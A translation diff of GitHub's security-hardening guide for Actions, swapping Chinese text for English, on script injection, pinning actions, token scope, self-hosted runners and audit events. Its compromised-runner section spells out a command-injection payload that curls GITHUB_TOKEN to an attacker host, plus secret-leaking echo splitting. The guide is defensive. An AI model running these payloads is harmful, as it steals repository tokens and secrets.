+With this approach, the value of the {% raw %}`${{ github.event.issue.title }}`{% endraw %} expression is stored in memory and used as a variable, and doesn't interact with the script generation process. In addition, consider using double quote shell variables to avoid [word splitting](https://github.com/koalaman/shellcheck/wiki/SC2086), but this is [one of many](https://mywiki.wooledge.org/BashPitfalls) general recommendations for writing shell scripts, and is not specific to {% data variables.product.prodname_actions %}.

 {% ifversion fpt or ghec %}
 ### Using starter workflows for code scanning
@@ -149,9 +149,9 @@ For more information, see "[About {% data variables.product.prodname_code_scanni

 {% endif %}

-### 限制令牌权限
+### Restricting permissions for tokens

-为了帮助降低暴露令牌的风险，请考虑限制分配的权限。 更多信息请参阅“[修改 GITHUB_TOKEN 的权限](/actions/reference/authentication-in-a-workflow#modifying-the-permissions-for-the-github_token)”。
+To help mitigate the risk of an exposed token, consider restricting the assigned permissions. For more information, see "[Modifying the permissions for the GITHUB_TOKEN](/actions/reference/authentication-in-a-workflow#modifying-the-permissions-for-the-github_token)."

 {% ifversion fpt or ghec or ghae-issue-4856 %}

@@ -161,32 +161,32 @@ For more information, see "[About {% data variables.product.prodname_code_scanni

 {% endif %}

-## 使用第三方操作
+## Using third-party actions

-工作流程中的个别作业可以与其他作业相互作用（和妥协）。 例如，查询以后作业使用的环境变量，将文件写入以后作业处理的共享目录，或者更直接地与 Docker 套接字接交互，以及检查其他正在运行的容器并执行其中的命令。
+The individual jobs in a workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them.

-这意味着工作流程中单一操作的泄露可能很严重，因为这个泄露的操作可以访问您仓库中配置的所有密码， 并且可以使用 `GITHUB_TOKENN` 写入仓库。 因此，从 {% data variables.product.prodname_dotcom %} 上的第三方仓库获取操作的风险很大。 有关攻击者可能采取的某些步骤的信息，请参阅“[受损运行器的潜在影响](/actions/learn-github-actions/security-hardening-for-github-actions#potential-impact-of-a-compromised-runner)”。
+This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on {% data variables.product.prodname_dotcom %}. For information on some of the steps an attacker could take, see ["Potential impact of a compromised runner](/actions/learn-github-actions/security-hardening-for-github-actions#potential-impact-of-a-compromised-runner)."

-您可以遵循以下良好做法来帮助降低此风险：
+You can help mitigate this risk by following these good practices:

-* **将操作固定到全长提交 SHA**
+* **Pin actions to a full length commit SHA**

-  将操作固定到全长提交 SHA 是当前将操作用作不可变版本的唯一方法。 固定到特定 SHA 有助于降低恶意执行者向操作仓库添加后门的风险，因为他们需要为有效的 Git 对象负载生成 SHA-1 冲突。
+  Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload.

+  

+* **Audit the source code of the action**

-* **审核操作的源代码**
+  Ensure that the action is handling the content of your repository and secrets as expected. For example, check that secrets are not sent to unintended hosts, or are not inadvertently logged.

-  确保操作按照预期处理仓库和密码的内容。 例如，确认密码未发送到非预期主机，或者没有被无意中记录。
+* **Pin actions to a tag only if you trust the creator**

-* **仅当您信任创建者时，才将操作固定到标记**
-
-  尽管固定到提交 SHA 是最安全的选项，但指定标记更方便，而且被广泛使用。 如果要指定标记，请确保信任该操作的创建者。 {% data variables.product.prodname_marketplace %} 上的“已验证创建者”徽章是一个有用的信号，因为它表示该操作是由其身份已被 {% data variables.product.prodname_dotcom %} 验证的团队编写的。 请注意，即使您信任作者，这种方法也存在风险，因为如果恶意执行者获得对存储操作的仓库的访问权限，便可移动或删除标记。
+  Although pinning to a commit SHA is the most secure option, specifying a tag is more convenient and is widely used. If you’d like to specify a tag, then be sure that you trust the action's creators. The ‘Verified creator’ badge on {% data variables.product.prodname_marketplace %} is a useful signal, as it indicates that the action was written by a team whose identity has been verified by {% data variables.product.prodname_dotcom %}. Note that there is risk to this approach even if you trust the author, because a tag can be moved or deleted if a bad actor gains access to the repository storing the action.

 {% ifversion fpt or ghes > 3.3 or ghae-issue-4757 or ghec %}
 ## Reusing third-party workflows

-The same principles described above for using third-party actions also apply to using third-party workflows. You can help mitigate the risks associated with reusing workflows by following the same good practices outlined above. For more information, see "[Reusing workflows](/actions/learn-github-actions/reusing-workflows)."
+The same principles described above for using third-party actions also apply to using third-party workflows. You can help mitigate the risks associated with reusing workflows by following the same good practices outlined above. For more information, see "[Reusing workflows](/actions/learn-github-actions/reusing-workflows)." 
 {% endif %}

 {% if internal-actions %}
@@ -199,17 +199,17 @@ The same principles described above for using third-party actions also apply to

 [Scorecards](https://github.com/ossf/scorecard) is an automated security tool that flags risky supply chain practices. You can use the [Scorecards action](https://github.com/marketplace/actions/ossf-scorecard-action) and [starter workflow](https://github.com/actions/starter-workflows) to follow best security practices. Once configured, the Scorecards action runs automatically on repository changes, and alerts developers about risky supply chain practices using the built-in code scanning experience. The Scorecards project runs a number of checks, including script injection attacks, token permissions, and pinned actions.

-## 受损运行器的潜在影响
+## Potential impact of a compromised runner

-这些部分考虑了当攻击者能够对 {% data variables.product.prodname_actions %} 运行器运行恶意命令时可以采取的一些步骤。
+These sections consider some of the steps an attacker can take if they're able to run malicious commands on a {% data variables.product.prodname_actions %} runner. 

-### 访问密钥
+### Accessing secrets

-使用 `pull_request` 事件触发的工作流程具有只读权限，不能访问密钥。 但是，这些权限因各种事件触发因素（如 `issue_comment`、`issues` 和 `push`）而有所不同，攻击者可能试图窃取仓库机密或使用作业 [`GITHUB_TOKEN`](/actions/reference/authentication-in-a-workflow#permissions-for-the-github_token) 的写入权限。
+Workflows triggered using the `pull_request` event have read-only permissions and have no access to secrets. However, these permissions differ for various event triggers such as `issue_comment`, `issues` and `push`, where the attacker could attempt to steal repository secrets or use the write permission of the job's [`GITHUB_TOKEN`](/actions/reference/authentication-in-a-workflow#permissions-for-the-github_token). 

- 如果密钥或令牌设置为环境变量，它可以使用 `printenv` 通过环境直接访问。
- 如果在表达式中直接使用密钥，生成的 shell 脚本将存储在磁盘上，并且可以访问。
- 对于自定义操作，风险可能因程序如何使用从参数中获取的密钥而异：
+- If the secret or token is set to an environment variable, it can be directly accessed through the environment using `printenv`.
+- If the secret is used directly in an expression, the generated shell script is stored on-disk and is accessible.
+- For a custom action, the risk can vary depending on how a program is using the secret it obtained from the argument:

  {% raw %}
  ```
@@ -219,70 +219,70 @@ The same principles described above for using third-party actions also apply to
  ```
  {% endraw %}

-虽然 {% data variables.product.prodname_actions %} 会从工作流程（或包含的操作）中未引用的内存中清除密钥，但 `GITHUB_TOKEN` 和任何引用的密钥均可被坚定的攻击者获取。
+Although {% data variables.product.prodname_actions %} scrubs secrets from memory that are not referenced in the workflow (or an included action), the `GITHUB_TOKEN` and any referenced secrets can be harvested by a determined attacker.

-### 泄露运行器中的数据
+### Exfiltrating data from a runner

-攻击者可以从运行器泄露任何被盗的密钥或其他数据。 为了帮助防止意外的密钥泄露，{% data variables.product.prodname_actions %} [自动编辑打印到日志的密钥](/actions/reference/encrypted-secrets#accessing-your-secrets)，但这不是一个真正的安全边界，因为密钥可以故意发送到日志。 例如，可使用 `echo ${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200};` 来解析混淆的密钥。 此外，由于攻击者可能运行任意命令，他们可以使用 HTTP 请求将机密或其他仓库数据发送到外部服务器。
+An attacker can exfiltrate any stolen secrets or other data from the runner. To help prevent accidental secret disclosure, {% data variables.product.prodname_actions %} [automatically redact secrets printed to the log](/actions/reference/encrypted-secrets#accessing-your-secrets), but this is not a true security boundary because secrets can be intentionally sent to the log. For example, obfuscated secrets can be exfiltrated using `echo ${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200};`. In addition, since the attacker may run arbitrary commands, they could use HTTP requests to send secrets or other repository data to an external server.

-### 窃取作业的 `GITHUB_TOKEN`
+### Stealing the job's `GITHUB_TOKEN`

-攻击者有可能窃取作业的 `GITHUB_TOKEN`。 {% data variables.product.prodname_actions %} 运行器自动接收生成的 `GITHUB_TOKEN`，权限仅限于包含工作流程的仓库，令牌在作业完成后过期。 一旦过期，令牌对攻击者不再有用。 为了解决此限制，他们可以通过调用带有令牌的攻击者控制的服务器（例如：`a"; set +e; curl http://example.lab?token=$GITHUB_TOKEN;#`）来自动执行攻击并在几分之一秒内完成攻击。
+It is possible for an attacker to steal a job's `GITHUB_TOKEN`. The {% data variables.product.prodname_actions %} runner automatically receives a generated `GITHUB_TOKEN` with permissions that are limited to just the repository that contains the workflow, and the token expires after the job has completed. Once expired, the token is no longer useful to an attacker. To work around this limitation, they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example: `a"; set +e; curl http://example.lab?token=$GITHUB_TOKEN;#`.

-### 修改仓库的内容
+### Modifying the contents of a repository

 The attacker server can use the {% ifversion fpt or ghec %}{% data variables.product.prodname_dotcom %}{% else %}{% data variables.product.product_name %}{% endif %} API to [modify repository content](/actions/reference/authentication-in-a-workflow#permissions-for-the-github_token), including releases, if the assigned permissions of `GITHUB_TOKEN` [are not restricted](/actions/reference/authentication-in-a-workflow#modifying-the-permissions-for-the-github_token).

-## 考虑跨仓库访问
+## Considering cross-repository access

-{% data variables.product.prodname_actions %} is intentionally scoped for a single repository at a time. The `GITHUB_TOKEN` grants the same level of access as a write-access user, because any write-access user can access this token by creating or modifying a workflow file{% ifversion fpt or ghes > 3.1 or ghae or ghec %}, elevating the permissions of the `GITHUB_TOKEN` if necessary{% endif %}. 用户对每个仓库都有特定权限，因此，如果不谨慎实施，一个仓库的 `GITHUB_TOKEN` 库授予对另一个仓库的访问权限将会影响 {% data variables.product.prodname_dotcom %} 权限模型。 同样，在向工作流程添加 {% data variables.product.prodname_dotcom %} 授权令牌时也必须谨慎，因为这也会因无意中向协作者授予一般权限而影响 {% data variables.product.prodname_dotcom %} 权限模型。
+{% data variables.product.prodname_actions %} is intentionally scoped for a single repository at a time. The `GITHUB_TOKEN` grants the same level of access as a write-access user, because any write-access user can access this token by creating or modifying a workflow file{% ifversion fpt or ghes > 3.1 or ghae or ghec %}, elevating the permissions of the `GITHUB_TOKEN` if necessary{% endif %}. Users have specific permissions for each repository, so allowing the `GITHUB_TOKEN` for one repository to grant access to another would impact the {% data variables.product.prodname_dotcom %} permission model if not implemented carefully. Similarly, caution must be taken when adding {% data variables.product.prodname_dotcom %} authentication tokens to a workflow, because this can also affect the {% data variables.product.prodname_dotcom %} permission model by inadvertently granting broad access to collaborators.

-我们已经[制定 {% data variables.product.prodname_dotcom %} 路线图](https://github.com/github/roadmap/issues/74)，以支持允许在 {% data variables.product.product_name %} 内跨仓库访问的流程，但这还不是一项受支持的功能。 目前，执行特权跨仓库交互的唯一方法就是将 {% data variables.product.prodname_dotcom %} 身份验证令牌或 SSH 密钥作为工作流程中的密码。 由于许多身份验证令牌类型不允许对特定资源进行细致的访问，因此使用错误的令牌类型存在很大风险，因为它可以授予比预期范围更广泛的访问。
+We have [a plan on the {% data variables.product.prodname_dotcom %} roadmap](https://github.com/github/roadmap/issues/74) to support a flow that allows cross-repository access within {% data variables.product.product_name %}, but this is not yet a supported feature. Currently, the only way to perform privileged cross-repository interactions is to place a {% data variables.product.prodname_dotcom %} authentication token or SSH key as a secret within the workflow. Because many authentication token types do not allow for granular access to specific resources, there is significant risk in using the wrong token type, as it can grant much broader access than intended.

-此列表描述建议用于在工作流程中访问仓库数据的方法，按优先顺序降序排列：
+This list describes the recommended approaches for accessing repository data within a workflow, in descending order of preference:

-1. **`GITHUB_TOKEN`**
-    -  此令牌被故意扩展到单个调用工作流程的仓库，并且{% ifversion fpt or ghes > 3.1 or ghae or ghec %}可以有 {% else %}具有 {% endif %}与仓库的写入用户相同的访问权限。 令牌在每个作业开始之前创建，在作业完成时过期。 更多信息请参阅“[使用 GITHUB_TOKEN 验证身份](/actions/configuring-and-managing-workflows/authenticating-with-the-github_token)”。
-    - 应尽可能使用 `GITHUB_TOKEN`。
-2. **仓库部署密钥**
-    - 部署密钥是唯一授予对单个存储库的读取或写入访问权限的凭据类型之一，可用于与工作流程中的另一个仓库进行交互。 更多信息请参阅“[管理部署密钥](/developers/overview/managing-deploy-keys#deploy-keys)”。
-    - 请注意，部署密钥只能使用 Git 克隆和推送到仓库，不能用于与 REST 或 GraphQL API 进行交互，因此它们可能不适合您的要求。
-3. **{% data variables.product.prodname_github_app %} 令牌**
-    - {% data variables.product.prodname_github_apps %} 可以安装在选择的仓库上，甚至可以对其中的资源设置细致的访问权限。 您可以创建组织内部的 {% data variables.product.prodname_github_app %}，将其安装在工作流程中您需要访问的仓库上，并在工作流程中验证为安装以访问这些仓库。
-4. **个人访问令牌**
-    - 切勿使用您自己帐户的个人访问令牌。 这些令牌授予您访问组织中您有权访问的所有仓库，以及您的用户帐户中的所有个人仓库。 这间接地向所有能写入工作流程所在仓库的用户授予广泛访问权限。 此外，如果您以后离开组织，使用此令牌的工作流程将立即中断，而且调试此问题可能具有挑战性。
-    - 如果使用个人访问令牌，应是为新帐户生成的令牌，该帐户仅被授予对工作流程所需的特定仓库的访问权限。 请注意，此方法不可扩展，应避免采用其他方法，例如部署密钥。
-5. **用户帐户上的 SSH 密钥**
-    - 工作流程不应使用用户帐户上的 SSH 密钥。 与个人访问令牌类似，它们授予对所有个人仓库以及通过组织成员资格访问的所有仓库的读/写权限。  这间接地向所有能写入工作流程所在仓库的用户授予广泛访问权限。 如果您打算使用 SSH 密钥，因为您只需要执行仓库克隆或推送，并且不需要与公共 API 交互，则应该使用单独的部署密钥。
+1. **The `GITHUB_TOKEN`**
+    -  This token is intentionally scoped to the single repository that invoked the workflow, and {% ifversion fpt or ghes > 3.1 or ghae or ghec %}can have {% else %}has {% endif %}the same level of access as a write-access user on the repository. The token is created before each job begins and expires when the job is finished. For more information, see "[Authenticating with the GITHUB_TOKEN](/actions/configuring-and-managing-workflows/authenticating-with-the-github_token)."
+    - The `GITHUB_TOKEN` should be used whenever possible.
+2. **Repository deploy key**
+    - Deploy keys are one of the only credential types that grant read or write access to a single repository, and can be used to interact with another repository within a workflow. For more information, see "[Managing deploy keys](/developers/overview/managing-deploy-keys#deploy-keys)."
+    - Note that deploy keys can only clone and push to the repository using Git, and cannot be used to interact with the REST or GraphQL API, so they may not be appropriate for your requirements.
+3. **{% data variables.product.prodname_github_app %} tokens**
+    - {% data variables.product.prodname_github_apps %} can be installed on select repositories, and even have granular permissions on the resources within them. You could create a {% data variables.product.prodname_github_app %} internal to your organization, install it on the repositories you need access to within your workflow, and authenticate as the installation within your workflow to access those repositories.
+4. **Personal access tokens**
+    - You should never use personal access tokens from your own account. These tokens grant access to all repositories within the organizations that you have access to, as well as all personal repositories in your user account. This indirectly grants broad access to all write-access users of the repository the workflow is in. In addition, if you later leave an organization, workflows using this token will immediately break, and debugging this issue can be challenging.
+    - If a personal access token is used, it should be one that was generated for a new account that is only granted access to the specific repositories that are needed for the workflow. Note that this approach is not scalable and should be avoided in favor of alternatives, such as deploy keys.
+5. **SSH keys on a user account**
+    - Workflows should never use the SSH keys on a user account. Similar to personal access tokens, they grant read/write permissions to all of your personal repositories as well as all the repositories you have access to through organization membership.  This indirectly grants broad access to all write-access users of the repository the workflow is in. If you're intending to use an SSH key because you only need to perform repository clones or pushes, and do not need to interact with public APIs, then you should use individual deploy keys instead.

-## 自托管运行器的强化
+## Hardening for self-hosted runners

 {% ifversion fpt or ghec %}
-**{% data variables.product.prodname_dotcom %} 托管的**运行程序在临时和干净的隔离虚拟机中执行代码，这意味着无法持续破坏此环境，可以访问的信息不会超过引导过程中此环境中存在的信息。
+**{% data variables.product.prodname_dotcom %}-hosted** runners execute code within ephemeral and clean isolated virtual machines, meaning there is no way to persistently compromise this environment, or otherwise gain access to more information than was placed in this environment during the bootstrap process.
 {% endif %}

 {% ifversion fpt or ghec %}**Self-hosted**{% elsif ghes or ghae %}Self-hosted{% endif %} runners for {% data variables.product.product_name %} do not have guarantees around running in ephemeral clean virtual machines, and can be persistently compromised by untrusted code in a workflow.

-{% ifversion fpt or ghec %}As a result, self-hosted runners should almost [never be used for public repositories](/actions/hosting-your-own-runners/about-self-hosted-runners#self-hosted-runner-security-with-public-repositories) on {% data variables.product.product_name %}, because any user can open pull requests against the repository and compromise the environment. Similarly, be{% elsif ghes or ghae %}Be{% endif %} cautious when using self-hosted runners on private or internal repositories, as anyone who can fork the repository and open a pull request (generally those with read access to the repository) are able to compromise the self-hosted runner environment, including gaining access to secrets and the `GITHUB_TOKEN` which{% ifversion fpt or ghes > 3.1 or ghae or ghec %}, depending on its settings, can grant {% else %} grants {% endif %}write access to the repository. 尽管工作流程可以通过使用环境和必需的审查来控制对环境密钥的访问，但是这些工作流程不是在隔离的环境中运行，在自托管运行程器上运行时仍然容易遭受相同的风险。
+{% ifversion fpt or ghec %}As a result, self-hosted runners should almost [never be used for public repositories](/actions/hosting-your-own-runners/about-self-hosted-runners#self-hosted-runner-security-with-public-repositories) on {% data variables.product.product_name %}, because any user can open pull requests against the repository and compromise the environment. Similarly, be{% elsif ghes or ghae %}Be{% endif %} cautious when using self-hosted runners on private or internal repositories, as anyone who can fork the repository and open a pull request (generally those with read access to the repository) are able to compromise the self-hosted runner environment, including gaining access to secrets and the `GITHUB_TOKEN` which{% ifversion fpt or ghes > 3.1 or ghae or ghec %}, depending on its settings, can grant {% else %} grants {% endif %}write access to the repository. Although workflows can control access to environment secrets by using environments and required reviews, these workflows are not run in an isolated environment and are still susceptible to the same risks when run on a self-hosted runner.

-在组织或企业级别定义自托管运行器时， {% data variables.product.product_name %} 可将多个仓库中的工作流程安排到同一个运行器中。 因此，这些环境的安全危害可能会导致广泛的影响。 为了帮助缩小损害范围，可以通过将自托管运行器组织到单独的组中来创建边界。 You can restrict what {% if restrict-groups-to-workflows %}workflows, {% endif %}organizations and repositories can access runner groups. 更多信息请参阅“[使用组管理对自托管运行器的访问](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups)”。
+When a self-hosted runner is defined at the organization or enterprise level, {% data variables.product.product_name %} can schedule workflows from multiple repositories onto the same runner. Consequently, a security compromise of these environments can result in a wide impact. To help reduce the scope of a compromise, you can create boundaries by organizing your self-hosted runners into separate groups. You can restrict what {% if restrict-groups-to-workflows %}workflows, {% endif %}organizations and repositories can access runner groups. For more information, see "[Managing access to self-hosted runners using groups](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups)."

-您还应考虑自托管运行器机器的环境：
- 配置为自托管运行器的计算机上存储哪些敏感信息？ 例如，私有 SSH 密钥、API 访问令牌等。
- 计算机是否可通过网络访问敏感服务？ 例如，Azure 或 AWS 元数据服务。 此环境中的敏感信息量应保持在最低水平，您应该始终注意，任何能够调用工作流程的用户都有权访问此环境。
+You should also consider the environment of the self-hosted runner machines:
+- What sensitive information resides on the machine configured as a self-hosted runner? For example, private SSH keys, API access tokens, among others.
+- Does the machine have network access to sensitive services? For example, Azure or AWS metadata services. The amount of sensitive information in this environment should be kept to a minimum, and you should always be mindful that any user capable of invoking workflows has access to this environment.

-某些客户可能会尝试通过实施在每次作业执行后自动销毁自托管运行器的系统来部分降低这些风险。 但是，此方法可能不如预期有效，因为无法保证自托管运行器只运行一个作业。 有些任务将使用密钥作为命令行参数，可以在同一运行器上的另一个任务中看到，例如 `ps x -w`。 这可能导致秘密泄露。
+Some customers might attempt to partially mitigate these risks by implementing systems that automatically destroy the self-hosted runner after each job execution. However, this approach might not be as effective as intended, as there is no way to guarantee that a self-hosted runner only runs one job. Some jobs will use secrets as command-line arguments which can be seen by another job running on the same runner, such as `ps x -w`. This can lead to secret leakages.

 ### Planning your management strategy for self-hosted runners

 A self-hosted runner can be added to various levels in your {% data variables.product.prodname_dotcom %} hierarchy: the enterprise, organization, or repository level. This placement determines who will be able to manage the runner:

 **Centralized management:**
-  - If you plan to have a centralized team own the self-hosted runners, then the recommendation is to add your runners at the highest mutual organization or enterprise level. This gives your team a single location to view and manage your runners.
+  - If you plan to have a centralized team own the self-hosted runners, then the recommendation is to add your runners at the highest mutual organization or enterprise level. This gives your team a single location to view and manage your runners. 
  - If you only have a single organization, then adding your runners at the organization level is effectively the same approach, but you might encounter difficulties if you add another organization in the future.

 **Decentralized management:**
-  - If each team will manage their own self-hosted runners, then the recommendation is to add the runners at the highest level of team ownership. For example, if each team owns their own organization, then it will be simplest if the runners are added at the organization level too.
+  - If each team will manage their own self-hosted runners, then the recommendation is to add the runners at the highest level of team ownership. For example, if each team owns their own organization, then it will be simplest if the runners are added at the organization level too. 
  - You could also add runners at the repository level, but this will add management overhead and also increases the numbers of runners you need, since you cannot share runners between repositories.

 {% ifversion fpt or ghec or ghae-issue-4856 %}
@@ -292,78 +292,80 @@ If you are using {% data variables.product.prodname_actions %} to deploy to a cl

 {% endif %}

-## 审核 {% data variables.product.prodname_actions %} 事件
+## Auditing {% data variables.product.prodname_actions %} events

-您可以使用审核日志来监控组织中的管理任务。 审核日志记录操作类型、操作的运行时间以及执行操作的用户帐户。
+You can use the audit log to monitor administrative tasks in an organization. The audit log records the type of action, when it was run, and which user account performed the action.

-例如，您可以使用审核日志跟踪 `org.update_actions_secret` 事件，这些事件跟踪组织秘密的变化： ![审核日志条目](/assets/images/help/repository/audit-log-entries.png)
+For example, you can use the audit log to track the `org.update_actions_secret` event, which tracks changes to organization secrets:
+  ![Audit log entries](/assets/images/help/repository/audit-log-entries.png)

-以下表格描述了您可以在审核日志中找到的 {% data variables.product.prodname_actions %} 事件。 有关使用审核日志的更多信息，请参阅“[查看组织的审核日志](/organizations/keeping-your-organization-secure/reviewing-the-audit-log-for-your-organization#searching-the-audit-log)”。
+The following tables describe the {% data variables.product.prodname_actions %} events that you can find in the audit log. For more information on using the audit log, see
+"[Reviewing the audit log for your organization](/organizations/keeping-your-organization-secure/reviewing-the-audit-log-for-your-organization#searching-the-audit-log)."

 {% ifversion fpt or ghec %}
-### 环境事件
+### Events for environments

-| 操作                                  | 描述                                                                                   |
-| ----------------------------------- | ------------------------------------------------------------------------------------ |
-| `environment.create_actions_secret` | 在环境中创建机密时触发。 更多信息请参阅“[环境机密](/actions/reference/environments#environment-secrets)”。   |
-| `environment.delete`                | 当环境被删除时触发。 更多信息请参阅“[删除环境](/actions/reference/environments#deleting-an-environment)”。 |
-| `environment.remove_actions_secret` | 从环境中删除机密时触发。 更多信息请参阅“[环境机密](/actions/reference/environments#environment-secrets)”。   |
-| `environment.update_actions_secret` | 当环境中的机密更新时触发。 更多信息请参阅“[环境机密](/actions/reference/environments#environment-secrets)”。  |
+| Action | Description
+|------------------|-------------------
+| `environment.create_actions_secret` | Triggered when a secret is created in an environment. For more information, see ["Environment secrets](/actions/reference/environments#environment-secrets)."
+| `environment.delete` | Triggered when an environment is deleted. For more information, see ["Deleting an environment](/actions/reference/environments#deleting-an-environment)."
+| `environment.remove_actions_secret` |  Triggered when a secret is removed from an environment. For more information, see ["Environment secrets](/actions/reference/environments#environment-secrets)."
+| `environment.update_actions_secret` | Triggered when a secret in an environment is updated. For more information, see ["Environment secrets](/actions/reference/environments#environment-secrets)."
 {% endif %}

 {% ifversion fpt or ghes or ghec %}
-### 配置更改事件
-| 操作                     | 描述                                                                                                                                              |
-| ---------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- |
-| `repo.actions_enabled` | 为仓库启用 {% data variables.product.prodname_actions %} 时触发。 可以使用用户界面查看。 当您使用 REST API 访问审计日志时，此事件不可见。 更多信息请参阅“[使用 REST API](#using-the-rest-api)”。 |
+### Events for configuration changes
+| Action | Description
+|------------------|-------------------
+| `repo.actions_enabled` | Triggered when {% data variables.product.prodname_actions %} is enabled for a repository. Can be viewed using the UI. This event is not visible when you access the audit log using the REST API. For more information, see "[Using the REST API](#using-the-rest-api)."
 {% endif %}

-### 机密管理的事件
-| 操作                           | 描述                                                                                                                                                                    |
-| ---------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| `org.create_actions_secret`  | 为组织创建 {% data variables.product.prodname_actions %} 机密时触发。 更多信息请参阅“[为组织创建加密密码](/actions/reference/encrypted-secrets#creating-encrypted-secrets-for-an-organization)”。 |
-| `org.remove_actions_secret`  | 当 {% data variables.product.prodname_actions %} 密码被移除时触发。                                                                                                             |
-| `org.update_actions_secret`  | 在 {% data variables.product.prodname_actions %} 密码更新时触发。                                                                                                              |
-| `repo.create_actions_secret` | 为仓库创建 {% data variables.product.prodname_actions %} 密码时触发。 更多信息请参阅“[为仓库创建加密密码](/actions/reference/encrypted-secrets#creating-encrypted-secrets-for-a-repository)”。    |
-| `repo.remove_actions_secret` | 当 {% data variables.product.prodname_actions %} 密码被移除时触发。                                                                                                             |
-| `repo.update_actions_secret` | 在 {% data variables.product.prodname_actions %} 密码更新时触发。                                                                                                              |
+### Events for secret management
+| Action | Description
+|------------------|-------------------
+| `org.create_actions_secret` | Triggered when a {% data variables.product.prodname_actions %} secret is created for an organization. For more information, see "[Creating encrypted secrets for an organization](/actions/reference/encrypted-secrets#creating-encrypted-secrets-for-an-organization)."
+| `org.remove_actions_secret` | Triggered when a {% data variables.product.prodname_actions %} secret is removed.
+| `org.update_actions_secret` | Triggered when a {% data variables.product.prodname_actions %} secret is updated.
+| `repo.create_actions_secret ` | Triggered when a {% data variables.product.prodname_actions %} secret is created for a repository. For more information, see "[Creating encrypted secrets for a repository](/actions/reference/encrypted-secrets#creating-encrypted-secrets-for-a-repository)."
+| `repo.remove_actions_secret` | Triggered when a {% data variables.product.prodname_actions %} secret is removed.
+| `repo.update_actions_secret` | Triggered when a {% data variables.product.prodname_actions %} secret is updated.

-### 自托管运行器的事件
-| 操作                                        | 描述                                                                                                                                                                                                                                                                                                                            |
-| ----------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| `enterprise.register_self_hosted_runner`  | 在注册新的自托管运行器时触发。 更多信息请参阅“[将自托管运行器添加到企业](/actions/hosting-your-own-runners/adding-self-hosted-runners#adding-a-self-hosted-runner-to-an-enterprise)”。                                                                                                                                                                           |
-| `enterprise.remove_self_hosted_runner`    | 当自托管运行器被移除时触发。                                                                                                                                                                                                                                                                                                                |
-| `enterprise.runner_group_runners_updated` | 当运行器组成员列表更新时触发。 更多信息请参阅“[为组织设置组中的自托管运行器](/rest/reference/actions#set-self-hosted-runners-in-a-group-for-an-organization)”。{% ifversion fpt or ghes > 3.1  or ghae or ghec %}
-| `enterprise.self_hosted_runner_online`    | 当运行器应用程序启动时触发。 只能使用 REST API 查看；在 UI 或 JSON/CSV 导出中不可见。 更多信息请参阅“[检查自托管运行器的状态](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)”。                                                                                                             |
-| `enterprise.self_hosted_runner_offline`   | 当运行器应用程序停止时触发。 只能使用 REST API 查看；在 UI 或 JSON/CSV 导出中不可见。 更多信息请参阅“[检查自托管运行器的状态](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)”。{% endif %}
-| `enterprise.self_hosted_runner_updated`   | 当运行器应用程序更新时触发。 可以使用 REST API 和 UI 查看。 当您将审核日志导出为 JSON 数据或 CSV 文件时，此事件不包括在内。 更多信息请参阅“[关于自托管的运行器](/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners)”和“[审查组织的审核日志](/organizations/keeping-your-organization-secure/reviewing-the-audit-log-for-your-organization#exporting-the-audit-log)”。 |
-| `org.register_self_hosted_runner`         | 在注册新的自托管运行器时触发。 更多信息请参阅“[将自托管运行器添加到组织](/actions/hosting-your-own-runners/adding-self-hosted-runners#adding-a-self-hosted-runner-to-an-organization)”。                                                                                                                                                                         |
-| `org.remove_self_hosted_runner`           | 当自托管运行器被移除时触发。 更多信息请参阅“[从组织移除运行器](/actions/hosting-your-own-runners/removing-self-hosted-runners#removing-a-runner-from-an-organization)”。                                                                                                                                                                                    |
-| `org.runner_group_runners_updated`        | 当运行器组成员列表更新时触发。 更多信息请参阅“[为组织设置组中的自托管运行器](/rest/reference/actions#set-self-hosted-runners-in-a-group-for-an-organization)”。                                                                                                                                                                                                    |
-| `org.runner_group_updated`                | 当自托管运行器组的配置改变时触发。 更多信息请参阅“[更改自托管运行器组的访问策略](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#changing-the-access-policy-of-a-self-hosted-runner-group)”。{% ifversion fpt or ghes > 3.1 or ghae or ghec %}
-| `org.self_hosted_runner_online`           | 当运行器应用程序启动时触发。 只能使用 REST API 查看；在 UI 或 JSON/CSV 导出中不可见。 更多信息请参阅“[检查自托管运行器的状态](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)”。                                                                                                             |
-| `org.self_hosted_runner_offline`          | 当运行器应用程序停止时触发。 只能使用 REST API 查看；在 UI 或 JSON/CSV 导出中不可见。 更多信息请参阅“[检查自托管运行器的状态](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)”。{% endif %}
-| `org.self_hosted_runner_updated`          | 当运行器应用程序更新时触发。 可以使用 REST API 和 UI 查看；在 JSON /CSV 导出中不可见。 更多信息请参阅“[关于自托管运行器](/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners)”。                                                                                                                                                          |
-| `repo.register_self_hosted_runner`        | 在注册新的自托管运行器时触发。 更多信息请参阅“[将自托管运行器添加到仓库](/actions/hosting-your-own-runners/adding-self-hosted-runners#adding-a-self-hosted-runner-to-a-repository)”。                                                                                                                                                                            |
